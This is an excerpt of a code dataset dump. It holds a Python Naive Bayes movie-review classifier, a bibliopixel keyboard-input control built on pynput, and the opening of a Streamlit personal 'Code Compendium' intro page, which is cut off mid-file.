hexsha
stringlengths 40
40
| size
int64 4
996k
| ext
stringclasses 8
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 6
130
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
245
| max_issues_repo_name
stringlengths 6
130
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
245
| max_forks_repo_name
stringlengths 6
130
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 4
996k
| avg_line_length
float64 1.33
58.2k
| max_line_length
int64 2
323k
| alphanum_fraction
float64 0
0.97
| content_no_comment
stringlengths 0
946k
| is_comment_constant_removed
bool 2
classes | is_sharp_comment_removed
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
790c4cdbd1634d4e8ab5589ffeb64063bf179072
| 13,443
|
py
|
Python
|
NaiveBayesClassifier.py
|
atahiraj/MLMovieReviewClassifier
|
87ee1ddeeddd36117b97f3772df9ed3dc7fa1da0
|
[
"MIT"
] | null | null | null |
NaiveBayesClassifier.py
|
atahiraj/MLMovieReviewClassifier
|
87ee1ddeeddd36117b97f3772df9ed3dc7fa1da0
|
[
"MIT"
] | null | null | null |
NaiveBayesClassifier.py
|
atahiraj/MLMovieReviewClassifier
|
87ee1ddeeddd36117b97f3772df9ed3dc7fa1da0
|
[
"MIT"
] | null | null | null |
import re
import numpy
import math
import sys
#tokenizes a review and removes common English stop words
# English stop words; a frozenset gives O(1) membership tests instead of the
# original O(n) scan of a list rebuilt on every call.
_STOP_WORDS = frozenset([
    "in", "i", "me", "my", "myself", "we", "our", "ours", "ourselves", "you",
    "your", "yours", "yourself", "yourselves", "he", "him", "his", "himself", "she",
    "her", "hers", "herself", "it", "its", "itself", "they", "them", "their",
    "theirs", "themselves", "what", "which", "who", "whom", "this", "that", "these",
    "those", "am", "is", "are", "was", "were", "be", "been", "being", "have", "has",
    "had", "having", "do", "does", "did", "doing", "a", "an", "the", "and", "but",
    "if", "or", "because", "as", "until", "while", "of", "at", "by", "for", "with",
    "about", "against", "between", "into", "through", "during", "before", "after",
    "above", "below", "to", "from", "up", "down", "out", "on", "off", "over",
    "under", "again", "further", "then", "once", "here", "there", "when", "where", "why",
    "how", "all", "any", "both", "each", "few", "more", "most", "other", "some", "such",
    "no", "nor", "not", "only", "own", "same", "so", "than", "too", "very", "s", "t",
    "can", "will", "just", "don", "should", "now"])

def extractCleanWords(review):
    """Tokenize *review* into lowercase words with stop words removed.

    BUG FIX: the original tested the raw token against the (lowercase)
    stop-word list and only lowercased afterwards, so capitalized stop
    words such as "The" or "I" slipped through the filter.
    """
    words = re.sub(r"[^\w]", " ", review).split()
    return [w.lower() for w in words if w.lower() not in _STOP_WORDS]
#used by bag of words to create the vocab dictionary
def createVocabTokens(reviews):
    """Return the sorted vocabulary: every unique clean word across *reviews*."""
    unique_words = set()
    for text in reviews:
        unique_words.update(extractCleanWords(text))
    return sorted(unique_words)
"""the bag of words for multinomialNB does not need to create
matrixes for each review because it takes too much space and slows
it down and it is not neccesary. The bag of words returns a
dictionary with the frequencies for each word used for the numerator of
P(xi|ci), the total words in the classifier used for the denom of
P(xi|ci), and the number of reviews for the class used to calculate
the prior probabilities for each class"""
def bagOfWords_MultinomialNB(txtFile):
    """Build multinomial NB bag-of-words statistics from one class's review file.

    txtFile: path to a file of reviews separated by "<br /><br />".

    Returns:
        vocabDict: {word: frequency} over the whole file (numerator of P(xi|ci)).
        total_words: total clean-word count in the file (denominator of P(xi|ci)).
        numReviews: number of reviews, used for the class prior.
    """
    with open(txtFile, 'r', encoding='utf8') as file:
        txt = file.read().replace('\n', '')
    reviewList = txt.split("<br /><br />")
    numReviews = len(reviewList)
    # Keys cover the whole vocabulary so every extracted word is present.
    vocabDict = dict.fromkeys(createVocabTokens(reviewList), 0)
    total_words = 0
    for review in reviewList:
        for word in extractCleanWords(review):
            vocabDict[word] += 1
            total_words += 1
    # NOTE: the original also ran `re.sub` over a rebound loop variable,
    # which had no effect and was removed.
    return vocabDict, total_words, numReviews
def bagOfWords_GaussianNB(txtFile):
    """Build Gaussian NB bag-of-words features from one class's review file.

    txtFile: path to a file of reviews separated by "<br /><br />".

    Returns:
        sparseMatrix: one {word: count} dict per review.
        vocabDict: {word: total count} over the whole file.
        numReviews: number of reviews in the file.
    """
    with open(txtFile, 'r', encoding='utf8') as file:
        txt = file.read().replace('\n', '')
    reviewList = txt.split("<br /><br />")
    numReviews = len(reviewList)
    vocabDict = dict.fromkeys(createVocabTokens(reviewList), 0)
    sparseMatrix = []
    # One pass builds both the corpus-wide counts and the per-review counts;
    # the original tokenized every review twice in two separate loops.
    for review in reviewList:
        bagList = {}
        for word in extractCleanWords(review):
            vocabDict[word] += 1
            bagList[word] = bagList.get(word, 0) + 1
        sparseMatrix.append(bagList)
    return sparseMatrix, vocabDict, numReviews
#calculates the per-word mean and variance from the selected feature representation
def calcMean_Var(txtFile, tfidforBOW):
    """Compute per-word [mean, variance] statistics for one class.

    txtFile: training file for the class.
    tfidforBOW: 1 selects bag-of-words features, anything else tf-idf.

    Returns {word: [mean, sample_variance]} where the mean is the average
    feature value per review and the variance uses the (n-1) denominator.
    """
    if tfidforBOW == 1:  # bag-of-words features
        sparseMatrix, vocabDict, numReviews = bagOfWords_GaussianNB(txtFile)
    else:
        sparseMatrix, vocabDict, numReviews = tf_idf(txtFile)
    meanVarDict = {}
    for word in vocabDict:
        mean = vocabDict[word] / numReviews
        var = 0.0
        # Reviews missing the word contribute (0 - mean)^2, as before.
        for row in sparseMatrix:
            var += (row.get(word, 0) - mean) ** 2
        # BUG FIX: the original mutated and stored ONE shared list for every
        # word, so all dict entries aliased the last word's statistics.
        # A fresh list per word keeps each entry independent.
        meanVarDict[word] = [mean, var / (numReviews - 1)]
    return meanVarDict
def gaussian_BOW(trainDataPos, trainDataNeg, testData, c):
    """Classify test reviews with Gaussian NB over bag-of-words features.

    trainDataPos / trainDataNeg: training files for the two classes.
    testData: file of reviews separated by "<br /><br />".
    c: true label of testData (1 = positive, 0 = negative).
    Returns the fraction of test reviews predicted as class c (accuracy).
    """
    with open(testData, 'r', encoding='utf8') as file:
        txt = file.read().replace('\n', '')
    reviewList = txt.split("<br /><br />")
    meanVarDictPOS = calcMean_Var(trainDataPos, 1)  # 1 -> bag-of-words
    meanVarDictNEG = calcMean_Var(trainDataNeg, 1)
    # Corpus-wide frequency of each known word in the test file.
    # NOTE(review): this is one frequency per word for the WHOLE test set,
    # not a per-review count — preserved from the original design; confirm
    # this is the intended feature value.
    testWordFreq = {}
    for review in reviewList:
        for word in extractCleanWords(review):
            if word in meanVarDictPOS or word in meanVarDictNEG:
                testWordFreq[word] = testWordFreq.get(word, 0) + 1
    prediction = []
    for review in reviewList:
        probPos = 0.0
        probNeg = 0.0
        for word in set(extractCleanWords(review)):
            # Gaussian log-likelihood: log(1/sqrt(2*pi*var)) - (x-mean)^2/(2*var).
            # BUG FIX: the original divided by var**2 and omitted the factor 2.
            if word in meanVarDictPOS:
                mean, var = meanVarDictPOS[word]
                probPos += math.log(1 / math.sqrt(2 * math.pi * var)) - ((testWordFreq[word] - mean) ** 2) / (2 * var)
            if word in meanVarDictNEG:
                mean, var = meanVarDictNEG[word]
                probNeg += math.log(1 / math.sqrt(2 * math.pi * var)) - ((testWordFreq[word] - mean) ** 2) / (2 * var)
        prediction.append(1 if probPos > probNeg else 0)
    # Accuracy relative to the known true class of this test file.
    return sum(1 for p in prediction if p == c) / len(prediction)
def tf_idf(txtFile):
    """Compute tf-idf features for every review in *txtFile*.

    Returns:
        sparseMatrixTFIDF: one {word: tf-idf} dict per review.
        vocabDict: {word: summed tf-idf over all reviews}.
        numReviews: number of reviews in the file.
    """
    with open(txtFile, 'r', encoding='utf8') as file:
        txt = file.read().replace('\n', '')
    reviewList = txt.split("<br /><br />")
    numReviews = len(reviewList)
    vocabTokens = createVocabTokens(reviewList)
    # Document frequency: number of reviews containing each word.
    vocabDictIDF = dict.fromkeys(vocabTokens, 0)
    sparseMatrixTFIDF = []
    for review in reviewList:
        words = extractCleanWords(review)
        bagListTF = {}
        for word in words:
            bagListTF[word] = bagListTF.get(word, 0) + 1
        # BUG FIX: term frequency must be normalized by THIS review's word
        # count; the original divided by a running total accumulated across
        # every review processed so far.
        reviewLen = len(words)
        for word in bagListTF:
            bagListTF[word] = bagListTF[word] / reviewLen if reviewLen else 0.0
            vocabDictIDF[word] += 1
        sparseMatrixTFIDF.append(bagListTF)
    # Scale each tf value by idf = log(N / df) and accumulate per-word totals.
    vocabDict = dict.fromkeys(vocabTokens, 0)
    for dictTF in sparseMatrixTFIDF:
        for word in dictTF:
            dictTF[word] *= math.log(numReviews / vocabDictIDF[word])
            vocabDict[word] += dictTF[word]
    return sparseMatrixTFIDF, vocabDict, numReviews
def gaussian_tf_idf(trainDataPos, trainDataNeg, testData, c):
    """Classify test reviews with Gaussian NB over tf-idf features.

    trainDataPos / trainDataNeg: training files for the two classes.
    testData: file of reviews separated by "<br /><br />".
    c: true label of testData (1 = positive, 0 = negative).
    Returns the fraction of test reviews predicted as class c (accuracy).
    """
    with open(testData, 'r', encoding='utf8') as file:
        txt = file.read().replace('\n', '')
    reviewList = txt.split("<br /><br />")
    meanVarDictPOS = calcMean_Var(trainDataPos, 0)  # 0 -> tf-idf features
    meanVarDictNEG = calcMean_Var(trainDataNeg, 0)
    # NOTE(review): testVocabDict[word] is the tf-idf value summed over the
    # whole test corpus, not a per-review feature — preserved from the
    # original design; confirm this is intended.
    testSparseTFIDF, testVocabDict, testNumReviews = tf_idf(testData)
    prediction = []
    for review in reviewList:
        probPos = 0.0
        probNeg = 0.0
        for word in set(extractCleanWords(review)):
            # Gaussian log-likelihood: log(1/sqrt(2*pi*var)) - (x-mean)^2/(2*var).
            # BUG FIX: the original squared the variance in the denominator.
            if word in meanVarDictPOS:
                mean, var = meanVarDictPOS[word]
                probPos += math.log(1 / math.sqrt(2 * math.pi * var)) - ((testVocabDict[word] - mean) ** 2) / (2 * var)
            if word in meanVarDictNEG:
                mean, var = meanVarDictNEG[word]
                probNeg += math.log(1 / math.sqrt(2 * math.pi * var)) - ((testVocabDict[word] - mean) ** 2) / (2 * var)
        prediction.append(1 if probPos > probNeg else 0)
    return sum(1 for p in prediction if p == c) / len(prediction)
def multinomialNB(trainDataPos, trainDataNeg, testData, c):
    """Classify test reviews with a multinomial Naive Bayes model.

    trainDataPos / trainDataNeg: training files for the two classes.
    testData: file of reviews separated by "<br /><br />".
    c: true label of testData (1 = positive, 0 = negative).
    Returns the fraction of test reviews predicted as class c (accuracy).
    """
    with open(testData, 'r', encoding='utf8') as file:
        text = file.read().replace('\n', '')
    testReviews = text.split("<br /><br />")
    # Per-class word frequencies, total word counts, and document counts.
    posDict, posWordCount, posDocs = bagOfWords_MultinomialNB(trainDataPos)
    negDict, negWordCount, negDocs = bagOfWords_MultinomialNB(trainDataNeg)
    # Smoothing parameter; 18 was found by trial to maximize accuracy.
    alpha = 18
    totalDocs = posDocs + negDocs
    logPriorPos = math.log(posDocs / totalDocs)
    logPriorNeg = math.log(negDocs / totalDocs)
    correct = 0
    for review in testReviews:
        scorePos = logPriorPos
        scoreNeg = logPriorNeg
        # dict.get(word, 0) collapses the original in/not-in branches:
        # an unseen word contributes alpha / (count + alpha*|V|).
        for word in set(extractCleanWords(review)):
            scorePos += math.log((posDict.get(word, 0) + alpha) / (posWordCount + alpha * len(posDict)))
            scoreNeg += math.log((negDict.get(word, 0) + alpha) / (negWordCount + alpha * len(negDict)))
        predicted = 1 if scorePos > scoreNeg else 0
        if predicted == c:
            correct += 1
    return correct / len(testReviews)
# Command-line arguments: paths to training and test data, one file per class.
train_pos = sys.argv[1]
train_neg = sys.argv[2]
test_pos = sys.argv[3]
test_neg = sys.argv[4]
# Multinomial NB accuracy on the positive (label 1) and negative (label 0) test sets.
posAcc = multinomialNB(train_pos, train_neg, test_pos,1)
negAcc = multinomialNB(train_pos, train_neg, test_neg,0)
# Report the average of the two per-class accuracies.
multinomialAcc = (posAcc+negAcc) / 2
print("MultinomialNB with bag of words accuracy: ", multinomialAcc)
# Gaussian NB over bag-of-words features.
gposAcc = gaussian_BOW(train_pos, train_neg, test_pos,1)
gnegAcc = gaussian_BOW(train_pos, train_neg, test_neg,0)
gaussAcc = (gposAcc+gnegAcc) / 2
print("Gaussian with bag of words accuracy: ", gaussAcc)
#calcMean_Var(train_pos,1)
#tf_idf(train_pos)
# Gaussian NB over tf-idf features.
tposAcc = gaussian_tf_idf(train_pos, train_neg, test_pos,1)
tnegAcc = gaussian_tf_idf(train_pos, train_neg, test_neg,0)
tgaussAcc = (tposAcc+tnegAcc) / 2
print("Gaussian with tf_idf acc: ", tgaussAcc)
| 39.654867
| 179
| 0.612512
|
import re
import numpy
import math
import sys
def extractCleanWords(review):
stopWords = ["in", "i", "me", "my", "myself", "we", "our", "ours", "ourselves", "you",
"your", "yours", "yourself", "yourselves", "he", "him", "his", "himself", "she",
"her", "hers", "herself", "it", "its", "itself", "they", "them", "their",
"theirs", "themselves", "what", "which", "who", "whom", "this", "that", "these",
"those", "am", "is", "are", "was", "were", "be", "been", "being", "have", "has",
"had", "having", "do", "does", "did", "doing", "a", "an", "the", "and", "but",
"if", "or", "because", "as", "until", "while", "of", "at", "by", "for", "with",
"about", "against", "between", "into", "through", "during", "before", "after",
"above", "below", "to", "from", "up", "down", "out", "on", "off", "over",
"under", "again", "further", "then", "once", "here", "there", "when", "where", "why",
"how", "all", "any", "both", "each", "few", "more", "most", "other", "some", "such",
"no", "nor", "not", "only", "own", "same", "so", "than", "too", "very", "s", "t",
"can", "will", "just", "don", "should", "now"]
words = re.sub("[^\w]", " ", review).split()
cleanWords = [i.lower() for i in words if i not in stopWords]
return cleanWords
def createVocabTokens(reviews):
vocab = []
for review in reviews:
token = extractCleanWords(review)
vocab.extend(token)
vocab = sorted(list(set(vocab)))
return vocab
def bagOfWords_MultinomialNB(txtFile):
total_words = 0
reviewFile = txtFile
with open(reviewFile, 'r', encoding='utf8') as file:
txt = file.read().replace('\n','')
reviewList = txt.split("<br /><br />")
for review in reviewList:
review = re.sub("[^\w\s]", "", review)
vocabTokens = createVocabTokens(reviewList)
numReviews = len(reviewList)
vocabDict = dict.fromkeys(vocabTokens, 0)
for i in range(len(reviewList)):
words = extractCleanWords(reviewList[i])
for word in words:
vocabDict[word] += 1
total_words +=1
return vocabDict, total_words, numReviews
def bagOfWords_GaussianNB(txtFile):
total_words = 0
reviewFile = txtFile
with open(reviewFile, 'r', encoding='utf8') as file:
txt = file.read().replace('\n','')
reviewList = txt.split("<br /><br />")
numReviews = len(reviewList)
for review in reviewList:
review = re.sub("[^\w\s]", "", review)
vocabTokens = createVocabTokens(reviewList)
vocabDict = dict.fromkeys(vocabTokens, 0)
for i in range(len(reviewList)):
words = extractCleanWords(reviewList[i])
for word in words:
vocabDict[word] += 1
sparseMatrix = []
for i in range(len(reviewList)):
words = extractCleanWords(reviewList[i])
bagList = {}
for word in words:
if word in bagList:
bagList[word] +=1
else:
bagList[word] = 1
sparseMatrix.append(bagList)
return sparseMatrix, vocabDict, numReviews
def calcMean_Var(txtFile, tfidforBOW):
if tfidforBOW == 1:
sparseMatrix, vocabDict, numReviews = bagOfWords_GaussianNB(txtFile)
else:
sparseMatrix, vocabDict, numReviews = tf_idf(txtFile)
meanVarDict = {}
meanVarTouple = [0,0]
for word in vocabDict:
meanVarTouple[0] = (vocabDict[word] / numReviews)
var = 0
for m in sparseMatrix:
if word in m:
var += ((m[word]-meanVarTouple[0])**2)
else:
var += ((-1*meanVarTouple[0])**2)
meanVarTouple[1] = (var / (numReviews -1))
meanVarDict[word] = meanVarTouple
return meanVarDict
def gaussian_BOW(trainDataPos, trainDataNeg, testData, c):
testFile = testData
with open(testFile, 'r', encoding='utf8') as file:
txt = file.read().replace('\n','')
reviewList = txt.split("<br /><br />")
for review in reviewList:
review = re.sub("[^\w\s]", "", review)
prediction = []
meanVarDictPOS = calcMean_Var(trainDataPos,1)
meanVarDictNEG = calcMean_Var(trainDataNeg,1)
testWordFreq = {}
for review in reviewList:
wordsInReview = extractCleanWords(review)
for word in wordsInReview:
if (word in meanVarDictPOS) or (word in meanVarDictNEG):
if word in testWordFreq:
testWordFreq[word] += 1
else:
testWordFreq[word] = 1
for review in reviewList:
wordsInReview = list(set(extractCleanWords(review)))
probPos =0
probNeg =0
for word in wordsInReview:
if word in meanVarDictPOS:
probPos += (math.log((1/(math.sqrt(2*math.pi*meanVarDictPOS[word][1])))) - (((testWordFreq[word] - meanVarDictPOS[word][0])**2)/((meanVarDictPOS[word][1]**2))))
if word in meanVarDictNEG:
probNeg += (math.log((1/(math.sqrt(2*math.pi*meanVarDictNEG[word][1])))) - (((testWordFreq[word] - meanVarDictNEG[word][0])**2)/((meanVarDictNEG[word][1]**2))))
if probPos > probNeg:
prediction.append(1)
else:
prediction.append(0)
poss = 0
for p in prediction:
if p == c:
poss +=1
return(poss/len(prediction))
def tf_idf(txtFile):
reviewFile = txtFile
with open(reviewFile, 'r', encoding='utf8') as file:
txt = file.read().replace('\n','')
reviewList = txt.split("<br /><br />")
numReviews = len(reviewList)
for review in reviewList:
review = re.sub("[^\w\s]", "", review)
vocabTokens = createVocabTokens(reviewList)
vocabDictIDF = dict.fromkeys(vocabTokens, 0)
totalNumWords = 0
sparseMatrixTFIDF = []
for i in range(len(reviewList)):
words = extractCleanWords(reviewList[i])
bagListTF = {}
for word in words:
totalNumWords +=1
if word in bagListTF:
bagListTF[word] +=1
else:
bagListTF[word] = 1
for word in list(set(words)):
bagListTF[word] = (bagListTF[word]/totalNumWords)
vocabDictIDF[word]+=1
sparseMatrixTFIDF.append(bagListTF)
vocabDict = dict.fromkeys(vocabTokens, 0)
for dictTF in sparseMatrixTFIDF:
for word in dictTF:
dictTF[word] = (dictTF[word] * (math.log((len(reviewList)/vocabDictIDF[word]))))
vocabDict[word]+= dictTF[word]
return sparseMatrixTFIDF, vocabDict, numReviews
def gaussian_tf_idf(trainDataPos, trainDataNeg, testData, c):
testFile = testData
with open(testFile, 'r', encoding='utf8') as file:
txt = file.read().replace('\n','')
reviewList = txt.split("<br /><br />")
for review in reviewList:
review = re.sub("[^\w\s]", "", review)
prediction = []
meanVarDictPOS = calcMean_Var(trainDataPos,0)
meanVarDictNEG = calcMean_Var(trainDataNeg,0)
testSparseTFIDF, testVocabDict, testNumReviews = tf_idf(testData)
for review in reviewList:
wordsInReview = list(set(extractCleanWords(review)))
probPos =0
probNeg =0
for word in wordsInReview:
if word in meanVarDictPOS:
probPos += (math.log((1/(math.sqrt(2*math.pi*meanVarDictPOS[word][1])))) - (((testVocabDict[word] - meanVarDictPOS[word][0])**2)/(2*(meanVarDictPOS[word][1]**2))))
if word in meanVarDictNEG:
probNeg += (math.log((1/(math.sqrt(2*math.pi*meanVarDictNEG[word][1])))) - (((testVocabDict[word] - meanVarDictNEG[word][0])**2)/(2*(meanVarDictNEG[word][1]**2))))
if probPos > probNeg:
prediction.append(1)
else:
prediction.append(0)
poss = 0
for p in prediction:
if p == c:
poss +=1
return(poss/len(prediction))
def multinomialNB(trainDataPos, trainDataNeg, testData, c):
testFile = testData
with open(testFile, 'r', encoding='utf8') as file:
txt = file.read().replace('\n','')
reviewList = txt.split("<br /><br />")
for review in reviewList:
review = re.sub("[^\w\s]", "", review)
prediction = []
posDict, posWordCount, posdocs = bagOfWords_MultinomialNB(trainDataPos)
negDict, negWordCount, negdocs = bagOfWords_MultinomialNB(trainDataNeg)
alpha = 18
priorLogPosProb =math.log( posdocs / (negdocs + posdocs))
priorLogNegProb =math.log( negdocs / (negdocs + posdocs))
for review in reviewList:
wordsInReview = list(set(extractCleanWords(review)))
logProbPos = 0
logProbNeg = 0
posPercent = 0
negPercent = 0
for word in wordsInReview:
if word not in posDict:
logProbPos += math.log( ((alpha) / (posWordCount+(alpha*len(posDict) ) ) ) )
if word in posDict:
logProbPos += math.log( ((posDict[word] + alpha) / (posWordCount+(alpha*len(posDict) ) ) ) )
if word not in negDict:
logProbNeg += math.log( ((alpha) / (negWordCount+(alpha*len(negDict) ) ) ) )
if word in negDict:
logProbNeg += math.log( ((negDict[word] + alpha) / (negWordCount+(alpha*len(negDict) ) ) ) )
posPercent = priorLogPosProb + logProbPos
negPercent = priorLogNegProb + logProbNeg
if posPercent > negPercent:
prediction.append(1)
else:
prediction.append(0)
poss = 0
for p in prediction:
if p == c:
poss +=1
return(poss/len(prediction))
train_pos = sys.argv[1]
train_neg = sys.argv[2]
test_pos = sys.argv[3]
test_neg = sys.argv[4]
posAcc = multinomialNB(train_pos, train_neg, test_pos,1)
negAcc = multinomialNB(train_pos, train_neg, test_neg,0)
multinomialAcc = (posAcc+negAcc) / 2
print("MultinomialNB with bag of words accuracy: ", multinomialAcc)
gposAcc = gaussian_BOW(train_pos, train_neg, test_pos,1)
gnegAcc = gaussian_BOW(train_pos, train_neg, test_neg,0)
gaussAcc = (gposAcc+gnegAcc) / 2
print("Gaussian with bag of words accuracy: ", gaussAcc)
tposAcc = gaussian_tf_idf(train_pos, train_neg, test_pos,1)
tnegAcc = gaussian_tf_idf(train_pos, train_neg, test_neg,0)
tgaussAcc = (tposAcc+tnegAcc) / 2
print("Gaussian with tf_idf acc: ", tgaussAcc)
| true
| true
|
790c4d1a5bb2537983cd5241bfbfbce93c31f024
| 1,583
|
py
|
Python
|
bibliopixel/control/keyboard.py
|
rec/leds
|
ed5fd11ed155e7008d4ef6d5b3d82cd7f8b3ed6a
|
[
"MIT"
] | 253
|
2015-01-03T23:17:57.000Z
|
2021-12-14T02:31:08.000Z
|
bibliopixel/control/keyboard.py
|
rec/leds
|
ed5fd11ed155e7008d4ef6d5b3d82cd7f8b3ed6a
|
[
"MIT"
] | 879
|
2015-01-11T16:07:25.000Z
|
2021-12-10T16:24:31.000Z
|
bibliopixel/control/keyboard.py
|
rec/leds
|
ed5fd11ed155e7008d4ef6d5b3d82cd7f8b3ed6a
|
[
"MIT"
] | 71
|
2015-01-04T01:02:47.000Z
|
2022-03-25T18:30:10.000Z
|
import getpass, platform, sys, threading
from .. util import log
from . control import ExtractedControl
# See https://stackoverflow.com/questions/42603000
# User-facing message printed via log.warning; %s is filled with sys.argv[0].
# BUG FIX: grammar — "must to be running" -> "must be running".
DARWIN_ROOT_WARNING = """
In MacOS, pynput must be running as root in order to get keystrokes.
Try running your program like this:
sudo %s <your commands here>
"""
# Raised by Keyboard._make_thread when the optional pynput dependency is absent.
INSTALL_ERROR = """
Please install the pynput library with
$ pip install pynput
"""
try:
    import pynput
except ImportError:
    # pynput is optional: when missing, both names become None and
    # Keyboard._make_thread raises ValueError(INSTALL_ERROR) instead.
    pynput = Listener = None
else:
    class Listener(pynput.keyboard.Listener):
        """Keyboard listener whose join() can return instead of blocking forever."""

        def join(self, timeout=None):
            # join() on pynput.keyboard.Listener waits on a queue; pushing a
            # sentinel wakes the worker so the join can actually complete.
            self._queue.put(None)
            return super().join(timeout)
def keyname(key):
    """Return a readable name for *key*: its ``name`` if truthy, else its ``char``."""
    name = getattr(key, 'name', None)
    if name:
        return name
    # Falls back to the character; raises AttributeError if neither exists.
    return getattr(key, 'char')
class Keyboard(ExtractedControl):
    """Control that feeds keyboard press/release events into the control pipeline."""

    # Extraction spec: which fields to keep for each event type, and how to
    # normalize raw pynput key objects into plain string names via keyname().
    EXTRACTOR = {
        'keys_by_type': {
            'press': ['type', 'key'],
            'release': ['type', 'key'],
        },
        'normalizers': {
            'key': keyname,
        },
    }

    def _press(self, key):
        # Forward a key-press event downstream.
        self.receive({'type': 'press', 'key': key})

    def _release(self, key):
        # Forward a key-release event downstream.
        self.receive({'type': 'release', 'key': key})

    def _make_thread(self):
        """Build the pynput listener thread; warn when keystrokes may be unavailable."""
        if not pynput:
            raise ValueError(INSTALL_ERROR)
        if platform.platform().startswith('Darwin'):
            if getpass.getuser() != 'root':
                # macOS only delivers global keystrokes to root processes.
                log.warning(DARWIN_ROOT_WARNING, sys.argv[0])
        log.info('Starting to listen for keyboard input')
        return Listener(self._press, self._release)
| 23.279412
| 71
| 0.60897
|
import getpass, platform, sys, threading
from .. util import log
from . control import ExtractedControl
DARWIN_ROOT_WARNING = """
In MacOS, pynput must to be running as root in order to get keystrokes.
Try running your program like this:
sudo %s <your commands here>
"""
INSTALL_ERROR = """
Please install the pynput library with
$ pip install pynput
"""
try:
import pynput
except ImportError:
pynput = Listener = None
else:
class Listener(pynput.keyboard.Listener):
def join(self, timeout=None):
self._queue.put(None)
return super().join(timeout)
def keyname(key):
return getattr(key, 'name', None) or getattr(key, 'char')
class Keyboard(ExtractedControl):
EXTRACTOR = {
'keys_by_type': {
'press': ['type', 'key'],
'release': ['type', 'key'],
},
'normalizers': {
'key': keyname,
},
}
def _press(self, key):
self.receive({'type': 'press', 'key': key})
def _release(self, key):
self.receive({'type': 'release', 'key': key})
def _make_thread(self):
if not pynput:
raise ValueError(INSTALL_ERROR)
if platform.platform().startswith('Darwin'):
if getpass.getuser() != 'root':
log.warning(DARWIN_ROOT_WARNING, sys.argv[0])
log.info('Starting to listen for keyboard input')
return Listener(self._press, self._release)
| true
| true
|
790c4f18ec4cb2893207635b674172ab900ba258
| 8,886
|
py
|
Python
|
.history/pages/intro_20220303160531.py
|
rypaik/Streamlit_Ref
|
5ce11cecbe8307238463c126b88b3beed66c99fa
|
[
"MIT"
] | null | null | null |
.history/pages/intro_20220303160531.py
|
rypaik/Streamlit_Ref
|
5ce11cecbe8307238463c126b88b3beed66c99fa
|
[
"MIT"
] | null | null | null |
.history/pages/intro_20220303160531.py
|
rypaik/Streamlit_Ref
|
5ce11cecbe8307238463c126b88b3beed66c99fa
|
[
"MIT"
] | null | null | null |
"""
Off Multipage Cheatsheet
https://github.com/daniellewisDL/streamlit-cheat-sheet
@daniellewisDL : https://github.com/daniellewisDL
"""
import streamlit as st
from pathlib import Path
import base64
from modules.toc import *
# Initial page configuration — must run before any other Streamlit call.
st.set_page_config(
    page_title='Code Compendium Intro Page',
    layout="wide",
    # initial_sidebar_state="expanded",
)
# col2.title("Table of contents")
# col2.write("http://localhost:8502/#display-progress-and-status")
# toc.header("Header 1")
# toc.header("Header 2")
# toc.subheader("Subheader 1")
# toc.subheader("Subheader 2")
# toc.generate()
# Thanks to streamlitopedia for the following code snippet
def img_to_bytes(img_path):
    """Read the file at *img_path* and return its bytes as a base64 string."""
    raw = Path(img_path).read_bytes()
    return base64.b64encode(raw).decode()
# sidebar
# def cs_sidebar():
# st.sidebar.markdown('''[<img src='data:image/png;base64,{}' class='img-fluid' width=32 height=32>](https://streamlit.io/)'''.format(img_to_bytes("logomark_website.png")), unsafe_allow_html=True)
# st.sidebar.header('Streamlit cheat sheet')
# st.sidebar.markdown('''
# <small>Summary of the [docs](https://docs.streamlit.io/en/stable/api.html), as of [Streamlit v1.0.0](https://www.streamlit.io/).</small>
# ''', unsafe_allow_html=True)
# st.sidebar.markdown('__How to install and import__')
# st.sidebar.code('$ pip install streamlit')
# st.sidebar.markdown('Import convention')
# st.sidebar.code('>>> import streamlit as st')
# st.sidebar.markdown('__Add widgets to sidebar__')
# st.sidebar.code('''
# st.sidebar.<widget>
# >>> a = st.sidebar.radio(\'R:\',[1,2])
# ''')
# st.sidebar.markdown('__Command line__')
# st.sidebar.code('''
# $ streamlit --help
# $ streamlit run your_script.py
# $ streamlit hello
# $ streamlit config show
# $ streamlit cache clear
# $ streamlit docs
# $ streamlit --version
# ''')
# st.sidebar.markdown('__Pre-release features__')
# st.sidebar.markdown('[Beta and experimental features](https://docs.streamlit.io/en/stable/api.html#beta-and-experimental-features)')
# st.sidebar.code('''
# pip uninstall streamlit
# pip install streamlit-nightly --upgrade
# ''')
# st.sidebar.markdown('''<small>[st.cheat_sheet v1.0.0](https://github.com/daniellewisDL/streamlit-cheat-sheet) | Oct 2021</small>''', unsafe_allow_html=True)
# return None
##########################
# Main body of cheat sheet
##########################
def cs_body():
    """Render the two-column main body of the intro page.

    BUG FIX: cs_body was previously nested inside a wrapper ``div()`` and so
    was never defined at module level — app() raised NameError. It is now a
    top-level function. Also fixes the ``col1.markdwon`` typo, which raised
    AttributeError on first render.
    """
    col1, col2 = st.columns(2)
    col1.title('Ryan Paik Coding Compendium')
    col1.markdown('''
“You don't learn to walk by following rules. You learn by doing, and by falling over.”
-Richard Branson
-----
''')
    col1.subheader("Welcome to my Code Compendium.")
    col1.markdown('''
This website/webapp is my personal cheatsheet for of all the code snippets that I have needed over the past 2 years. This ended up being a quick detour into Streamlit that I fell in love with while I was building flask api's.
-----
**Programming is only as deep as you want to dive in.**
This webapp features the basic code snippets from all the "googling" from programming I have done.
I have taken the plunge and have created my own markdown notebooks organizing information from quick solution tidbits to documentation for programming languages.
Please visit my github for practical code and my research notebooks:
*[rypaik (Ryan Paik) · GitHub](https://github.com/rypaik)*
If you would like access to my Gist please email me.
ryanpaik@protonmail.com
-----
**Bio:**
